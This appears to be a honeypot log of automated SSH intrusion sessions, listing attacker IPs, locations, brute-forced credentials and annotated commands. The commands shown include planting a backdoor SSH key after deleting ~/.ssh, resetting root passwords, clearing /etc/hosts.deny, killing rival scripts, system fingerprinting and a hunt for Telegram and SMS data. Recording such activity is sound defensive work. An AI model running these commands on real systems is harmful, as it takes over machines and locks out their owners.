$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "domaindnszones123\n0oJQtgLbEQlq\n0oJQtgLbEQlq"|passwd|bash
$ Enter new UNIX password:
$ echo "domaindnszones123\n0oJQtgLbEQlq\n0oJQtgLbEQlq\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_35 (186.146.235.58) β€” Cali, Colombia Β· 1 session Β· 19 cmds
2026-06-09 09:08 EDT Β· as root/1234qwerQWER
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:6WlnQ6H7TKIv"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shogun_root_2 (163.44.101.215) β€” Chiyoda City, Japan Β· 3 sessions Β· 40 cmds
2026-05-21 12:01 EDT Β· as greek/123456, root/P@55W0rd, root/password01!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:dVfsCE86qog8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:PQxSUZ0fSThm"|chpasswd|bash
🎭 viking_root (155.4.244.179) β€” Stockholm, Sweden Β· 3 sessions Β· 59 cmds
2026-06-09 07:42 EDT Β· as farhan/123, root/Js123456, server2/server2
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123\nr8oUhxcDWVLr\nr8oUhxcDWVLr"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123\nr8oUhxcDWVLr\nr8oUhxcDWVLr\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "server2\nRupJRbTlUInn\nRupJRbTlUInn"|passwd|bash
$ echo "server2\nRupJRbTlUInn\nRupJRbTlUInn\n"|passwd
$ echo "root:KbWg8rWV1l16"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 wraith_root_11 (112.120.171.95) β€” Lam Tin, Hong Kong Β· 4 sessions Β· 77 cmds
2026-05-21 00:17 EDT Β· as johnny/johnny123, root/P@55W0rd, root/Zc123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:x7JQmLYMm1Pj"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:ohbfp15M1QC0"|chpasswd|bash
$ echo -e "johnny123\nulFfXKNRCNKo\nulFfXKNRCNKo"|passwd|bash
$ Enter new UNIX password:
$ echo "johnny123\nulFfXKNRCNKo\nulFfXKNRCNKo\n"|passwd
$ echo "root:WdYOO6db0cIx"|chpasswd|bash
🎭 capoeira_root_2 (177.94.206.205) β€” Campinas, Brazil Β· 2 sessions Β· 38 cmds
2026-06-08 14:37 EDT Β· as root/P@55W0rd, root/Qq111111
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:gxENxMV1DCfU"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:jJR6Gsqfx3Cd"|chpasswd|bash
🎭 wraith_root_33 (161.248.189.72) β€” Mymensingh, Bangladesh Β· 2 sessions Β· 40 cmds
2026-06-09 07:43 EDT Β· as farhan/123, server2/server2
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "server2\nVbHKroOP85jz\nVbHKroOP85jz"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "server2\nVbHKroOP85jz\nVbHKroOP85jz\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123\nvePQRqwuAZH7\nvePQRqwuAZH7"|passwd|bash
$ echo "123\nvePQRqwuAZH7\nvePQRqwuAZH7\n"|passwd
🎭 ghost_root_36 (139.59.109.204) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-06-09 07:37 EDT Β· as root/P@55W0rd
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:3SBgONljpX2D"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_2 (45.66.52.41) β€” Almaty, Kazakhstan Β· 1 session Β· 20 cmds
2026-06-09 07:36 EDT Β· as server2/server2
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "server2\nmrhOrVZ7fOoV\nmrhOrVZ7fOoV"|passwd|bash
$ Enter new UNIX password:
$ echo "server2\nmrhOrVZ7fOoV\nmrhOrVZ7fOoV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 autobahn_3 (148.251.85.212) β€” Falkenstein, Germany Β· 1 session Β· 1 cmd
2026-06-09 07:35 EDT Β· as dev/12345
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a // CPU profiling
🎭 stein_root_10 (195.248.243.247) β€” Nuremberg, Germany Β· 1 session Β· 19 cmds
2026-06-09 07:32 EDT Β· as root/@qQ123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:fC5y7UrtsHMx"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 kimchi_root_5 (125.140.145.62) β€” Cheongju-si, South Korea Β· 1 session Β· 9 cmds
2026-06-09 06:04 EDT Β· as root/guest
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 wraith_root_34 (144.48.241.162) β€” San Po Kong, Hong Kong Β· 1 session Β· 19 cmds
2026-06-09 05:44 EDT Β· as root/@qQ123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:tkJF0R8p8jhc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 crepe (86.217.21.47) β€” AvrillΓ©, France Β· 1 session Β· 20 cmds
2026-06-09 05:39 EDT Β· as banana/banana
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "banana\n2rUpHouT38ds\n2rUpHouT38ds"|passwd|bash
$ Enter new UNIX password:
$ echo "banana\n2rUpHouT38ds\n2rUpHouT38ds\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_26 (196.189.155.89) β€” Addis Ababa, Ethiopia Β· 1 session Β· 20 cmds
2026-06-09 04:26 EDT Β· as john/12345678
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "12345678\n4mBcYFa3cW4j\n4mBcYFa3cW4j"|passwd|bash
$ Enter new UNIX password:
$ echo "12345678\n4mBcYFa3cW4j\n4mBcYFa3cW4j\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_27 (180.93.43.225) β€” QuαΊ­n Bα»‘n, Vietnam Β· 1 session Β· 20 cmds
2026-06-09 04:14 EDT Β· as manu/manu
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
